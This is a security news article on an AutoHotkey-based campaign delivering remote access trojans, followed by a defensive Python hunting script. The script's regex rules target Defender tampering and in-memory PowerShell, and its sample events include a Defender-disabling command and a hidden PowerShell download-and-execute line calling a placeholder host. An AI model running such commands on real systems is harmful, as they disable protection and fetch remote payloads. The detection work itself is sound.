Experts Warn About Ongoing AutoHotkey-Based Malware Attacks (Security News, May 2021)
Cybersecurity researchers have uncovered an ongoing malware campaign that relies heavily on the AutoHotkey scripting language to deliver multiple remote access trojans, including Revenge RAT, LimeRAT, AsyncRAT, Houdini, and Vjw0rm, to targeted Windows systems.
"The RAT delivery campaign starts from an AutoHotKey compiled script," the researchers noted.
AutoHotkey is an open-source custom scripting language for Microsoft Windows that's meant to provide easy hotkeys for macro-creation and software automation, enabling users to automate repetitive tasks in any Windows application.
In one variant of the attack, first detected on March 31, the adversary behind the campaign wrapped the dropped RAT in an AHK executable and, in addition, disabled Microsoft Defender by deploying a Batch script together with a shortcut file pointing to that script.
Lastly, a fourth attack chain discovered on April 21 used an AHK script to execute a legitimate application, before dropping a VBScript that runs an in-memory PowerShell script to fetch the HCrypt malware loader and install AsyncRAT. Morphisec researchers attributed all the different attack chains to the same threat actor, citing similarities in the AHK script and overlaps in the techniques used to disable Microsoft Defender.
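The attack chains above share three observable behaviours a defender can hunt for in process-creation telemetry: a compiled AHK executable spawning a shell or script host, a command line that disables Microsoft Defender, and a PowerShell stage that runs in memory. The following Python is an added example, not code from the article or from Morphisec, and it runs over constructed sample events rather than real telemetry. It assumes Sysmon-style fields (parent image, child image, command line) plus the first bytes of the parent binary; the `>AUTOHOTKEY SCRIPT<` resource marker is what Ahk2Exe embeds in compiled scripts, but an attacker can strip it, so it is treated as a weak signal that only matters in combination with a suspicious child process.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Resource marker that Ahk2Exe embeds when compiling a script into the
# AutoHotkey interpreter binary. Assumption: it can be removed or renamed,
# so it is only a weak indicator and never a verdict on its own.
AHK_RESOURCE_MARKER = b">AUTOHOTKEY SCRIPT<"

# Shells and script hosts that a benign AHK automation rarely needs to spawn.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}

# Command-line patterns for the two behaviours the article describes:
# Defender being switched off, and an in-memory PowerShell stage.
DEFENDER_TAMPER = re.compile(
    r"(Set-MpPreference\s+-Disable|Add-MpPreference\s+-Exclusion"
    r"|DisableAntiSpyware|sc(?:\.exe)?\s+stop\s+WinDefend)",
    re.IGNORECASE,
)
INMEMORY_PS = re.compile(
    r"(-enc(?:odedcommand)?\s|-w(?:indowstyle)?\s+hidden"
    r"|\bIEX\b|Invoke-Expression|DownloadString)",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    """One process-creation event (Sysmon Event ID 1 style, simplified)."""
    parent_image: str
    image: str
    command_line: str
    parent_bytes: bytes = b""  # head of the parent binary, if the sensor captured it


def is_compiled_ahk(pe_bytes: bytes) -> bool:
    """Weak check: does the binary carry the Ahk2Exe script resource marker?"""
    return AHK_RESOURCE_MARKER in pe_bytes


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every hunting rule the event matches."""
    findings = []
    child = basename(ev.image)
    # Rule 1: compiled AHK executable launching a shell or script host.
    if is_compiled_ahk(ev.parent_bytes) and child in SCRIPT_HOSTS:
        findings.append("ahk_spawns_script_host")
    # Rule 2: any process issuing a Defender-tampering command.
    if DEFENDER_TAMPER.search(ev.command_line):
        findings.append("defender_tamper")
    # Rule 3: PowerShell started with hidden/encoded/download-and-eval switches.
    if child == "powershell.exe" and INMEMORY_PS.search(ev.command_line):
        findings.append("inmemory_powershell")
    return findings


def triage(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Index and findings for every event that matched at least one rule."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]


# Constructed sample events (paths, names and the URL are placeholders).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\u\Downloads\invoice.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\u\AppData\Local\Temp\def.bat"',
              parent_bytes=b"MZ\x90\x00" + b"\x00" * 64 + AHK_RESOURCE_MARKER),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://placeholder.invalid/stage')\""),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad.exe readme.txt"),
    # Benign automation: a compiled AHK script opening the calculator.
    ProcEvent(r"C:\Tools\hotkeys.exe", r"C:\Windows\System32\calc.exe", "calc.exe",
              parent_bytes=b"MZ\x90\x00" + b"\x00" * 64 + AHK_RESOURCE_MARKER),
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Only the first three sample events fire; the compiled AHK binary that merely launches the calculator is left alone because the AHK marker by itself says nothing about intent. In a real deployment the marker check would be replaced by a file-scanning step or a YARA hit joined to the process event, and the command-line rules would be tuned against the environment's own administrative baseline.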
In December 2020, Trend Micro researchers uncovered a credential stealer written in the AutoHotkey scripting language that singled out financial institutions in the U.S. and Canada.